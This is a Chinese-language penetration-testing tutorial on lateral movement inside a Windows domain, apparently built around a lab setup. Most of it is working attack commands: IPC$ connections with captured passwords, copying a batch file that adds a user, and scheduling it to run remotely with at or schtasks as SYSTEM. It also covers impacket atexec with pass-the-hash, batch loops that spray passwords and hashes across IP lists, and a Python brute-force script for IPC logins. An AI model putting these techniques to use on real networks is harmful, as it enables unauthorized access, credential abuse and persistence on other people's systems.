横向渗透明文传递at&schtasks
在拿下一台内网主机后,通过本地信息搜集收集用户凭证等信息后,如何横向渗透拿下更多的主机?这里仅介绍at&schtasks命令的使用,在已知目标系统的用户明文密码的基础上,直接可以在远程主机上执行命令。
获取到某域主机权限->minikatz得到密码(明文,hash)->用到信息收集里面域用户的列表当做用户名字典->用到密码明文当做密码字典-》尝试连接->创建计划任务(at|schtasks)->执行文件可为后门或者相关命令
利用流程
1. 建立IPC链接到目标主机
2. 拷贝要执行的命令脚本到目标主机
3. 查看目标时间,创建计划任务(at、schtasks)定时执行拷贝到的脚本
4. 删除IPC链接
net use \\server\ipc$"password" /user:username # 工作组 net use \\server\ipc$"password" /user:domain\username #域内 dir \\xx.xx.xx.xx\C$\ # 查看文件列表 copy \\xx.xx.xx.xx\C$\1.bat 1.bat # 下载文件 copy 1.bat \\xx.xx.xx.xx\C$ # 复制文件 net use \\xx.xx.xx.xx\C$\1.bat /del # 删除IPC net view xx.xx.xx.xx # 查看对方共享
#建立IPC常见的错误代码
(1)5:拒绝访问,可能是使用的用户不是管理员权限,需要先提升权限
(2)51:网络问题,Windows 无法找到网络路径
(3)53:找不到网络路径,可能是IP地址错误、目标未开机、目标Lanmanserver服务未启动、有防火墙等问题
(4)67:找不到网络名,本地Lanmanworkstation服务未启动,目标删除ipc$
(5)1219:提供的凭据和已存在的凭据集冲突,说明已建立IPC$,需要先删除
(6)1326:账号密码错误
(7)1792:目标NetLogon服务未启动,连接域控常常会出现此情况
(8)2242:用户密码过期,目标有账号策略,强制定期更改密码
#建立IPC失败的原因
(1)目标系统不是NT或以上的操作系统
(2)对方没有打开IPC$共享
(3)对方未开启139、445端口,或者被防火墙屏蔽
(4)输出命令、账号密码有错误
windows 2012 前 系统支持 at 命令
windows 2012后 系统支持 schtasks 命令
当前主机环境
windows server 2012 为域控制器
windows server 2003 域用户
windows 7 域用户
#at < Windows2012
windows server 2003示例:
# 建立ipc连接: net use \\10.4.7.50\ipc$ "admin!@#45" /user:hack.org\administrator
创建一个bat脚本 copy到对方主机
添加用户 notepad add.bat net user linuxba test!@#123 /add #拷贝执行文件到目标机器 copy add.bat \\10.4.7.50\c$ #添加计划任务 at \\10.4.7.50 17:15 c:\add.bat
2003 查看用户列表
#schtasks >=Windows2012 # 建立ipc连接: net use \\10.4.7.52\ipc$ "admin!@#45" /user:hack.org\administrator
#复制文件到其C盘 copy add.bat \\10.4.7.52\c$ #创建adduser任务对应执行文件 schtasks /create /s 10.4.7.52 /ru "SYSTEM" /tn adduser /sc DAILY /tr c:\add.bat /F #运行adduser任务 schtasks /run /s 10.4.7.52 /tn adduser /i #删除adduser任务 schtasks /delete /s 10.4.7.52 /tn adduser /f
横向渗透明文HASH传递atexec-impacket
# 渗透win7 个人用户(明文) atexec.exe ./administrator:123@10.4.7.52 "whoami"
# 渗透win7 域域户 (明文) atexec.exe hack/administrator:admin!@#45@10.4.7.52 whoami
# hash 渗透 atexec.exe -hashes:e90127c07127ed12f4ebf668acca53e9 ./administrator@10.4.7.52 whoami 横向渗透明文HASH传递批量利用-综合 #批量检测IP对应明文连接 FOR /F %%i in (ips.txt) do net use \\%%i\ipc$ "admin!@#45" /user:administrator #批量检测IP对应明文回显版 FOR /F %%i in (ips.txt) do atexec.exe ./administrator:admin!@#45@%%i whoami #批量检测明文对应IP回显版 FOR /F %%i in (pass.txt) do atexec.exe ./administrator:%%i@10.4.7.52 whoami #批量检测HASH对应IP回显版 FOR /F %%i in (hash.txt) do atexec.exe -hashes :%%i ./administrator@10.4.7.52 whoami #横向渗透明文HASH传递批量利用-升级版 net use \\10.4.7.52\ipc$ admin!@#45 /user:hack\hack #pip install pyinstaller #pyinstaller -F newhash.py 生成可执行EXE import os,time ips={ '10.4.7.50', '10.4.7.51', '10.4.7.52' } users={ 'Administrator', 'hack', 'kali', 'ajie' } passs={ 'admin', 'admin!@#45', '123' } for ip in ips: for user in users: for mima in passs: exec="net use \\"+ "\\"+ip+'\ipc$ '+mima+' /user:hack\\'+user print('--->'+exec+'<---') os.system(exec) time.sleep(1)
